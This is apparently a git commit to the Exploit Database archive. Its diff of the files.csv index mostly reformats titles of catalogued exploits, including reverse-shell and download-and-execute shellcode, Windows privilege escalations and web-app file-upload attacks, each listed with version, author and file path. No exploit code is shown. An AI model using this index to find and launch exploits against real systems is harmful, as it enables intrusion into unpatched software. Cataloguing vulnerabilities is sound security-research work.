DB: 2016-07-09
9 new exploits Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067) Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067) Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability VLC AMV Dangling Pointer Vulnerability VLC - AMV Dangling Pointer Vulnerability Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability HP Client Automation Command Injection HP Client - Automation Command Injection Persistent Systems Client Automation Command Injection RCE Persistent Systems Client Automation - Command Injection RCE ElasticSearch Unauthenticated Remote Code Execution ElasticSearch - Unauthenticated Remote Code Execution ElasticSearch Search Groovy Sandbox Bypass ElasticSearch - Search Groovy Sandbox Bypass Fedora abrt Race Condition Exploit Fedora - abrt Race Condition Exploit ProFTPD 1.3.5 Mod_Copy Command Execution ProFTPD 1.3.5 - Mod_Copy Command Execution Windows ClientCopyImage Win32k Exploit Microsoft Windows - ClientCopyImage Win32k Exploit Wolf CMS Arbitrary File Upload To Command Execution Wolf CMS - Arbitrary File Upload To Command Execution Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1) Kaseya VSA uploader.aspx Arbitrary File Upload Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1) NETGEAR ProSafe Network Management System 300 Arbitrary File Upload NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) OS X / iOS Suid Binary Logic Error Kernel Code Execution OS X / iOS - Suid Binary Logic Error Kernel Code Execution Novell ServiceDesk Authenticated File Upload Novell ServiceDesk - Authenticated File Upload Mach Race OS X Local Privilege Escalation Exploit Mach Race OS X - Local Privilege Escalation Exploit Oracle ATS Arbitrary File Upload Oracle Application Testing Suite (ATS) - Arbitrary File Upload Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF Hide.Me VPN Client 1.2.4 - Privilege Escalation InstantHMI 6.1 - Privilege Escalation Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC Microsoft WinDbg logviewer.exe - Crash PoC Linux x86 TCP Reverse Shellcode - 75 bytes php Real Estate Script 3 - Arbitrary File Disclosure CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval Streamo Online Radio And TV Streaming CMS - SQL Injection
This commit is contained in:
parent
c7daadde64
commit
29f0764fac
10 changed files with 925 additions and 27 deletions
63
files.csv
63
files.csv
|
@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port
|
|||
1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0
|
||||
1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
|
||||
1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
|
||||
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0
|
||||
1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0
|
||||
1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
|
||||
|
@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port
|
|||
14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
|
||||
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
|
||||
14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
|
||||
14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
|
||||
14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
|
||||
14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
|
||||
14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0
|
||||
14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0
|
||||
|
@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port
|
|||
15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0
|
||||
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0
|
||||
16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
|
||||
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
|
||||
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
|
||||
16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0
|
||||
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
|
||||
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0
|
||||
|
@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port
|
|||
17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
|
||||
17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
|
||||
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
|
||||
17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
|
||||
17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
|
||||
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0
|
||||
17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
|
||||
17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
|
||||
|
@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port
|
|||
24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
|
||||
24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0
|
||||
24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0
|
||||
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
|
||||
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
|
||||
24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0
|
||||
24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0
|
||||
24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0
|
||||
|
@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port
|
|||
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
|
||||
29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
|
||||
29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
|
||||
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
|
||||
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
|
||||
29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0
|
||||
29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0
|
||||
29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0
|
||||
|
@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port
|
|||
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
|
||||
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
|
||||
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
|
||||
36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
|
||||
36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
|
||||
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
|
||||
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
|
||||
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
|
||||
|
@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port
|
|||
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
|
||||
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
|
||||
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
|
||||
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
|
||||
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
|
||||
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
|
||||
|
@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port
|
|||
36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
|
||||
36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
|
||||
36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
|
||||
36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
|
||||
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
|
||||
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
|
||||
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
|
||||
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
|
||||
|
@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port
|
|||
36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
|
||||
36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
|
||||
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
|
||||
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
|
||||
36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
|
||||
36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
|
||||
36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
|
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
|
|||
36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
|
||||
36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
|
||||
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
|
||||
36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
|
||||
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
|
||||
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
|
||||
|
@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port
|
|||
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
|
||||
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
|
||||
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
|
||||
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
|
||||
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
|
||||
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
|
||||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||
|
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
|
|||
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
|
||||
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
|
||||
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
|
||||
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
|
||||
37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
|
||||
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
|
||||
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
|
||||
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
|
||||
|
@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port
|
|||
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
|
||||
37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
|
||||
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
|
||||
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
|
||||
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
|
||||
|
@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port
|
|||
38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
|
||||
38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
|
||||
|
@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port
|
|||
38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
|
||||
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
|
||||
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
|
||||
38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
|
||||
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
|
||||
38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
|
||||
38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
|
||||
38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
|
||||
|
@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port
|
|||
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
|
||||
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
|
||||
38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
|
||||
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
|
||||
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
|
||||
38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
|
||||
38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
|
||||
38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
|
||||
|
@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port
|
|||
39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
|
||||
39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
|
||||
39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
|
||||
39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
|
||||
39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
|
||||
|
@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port
|
|||
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0
|
||||
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
|
||||
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
|
||||
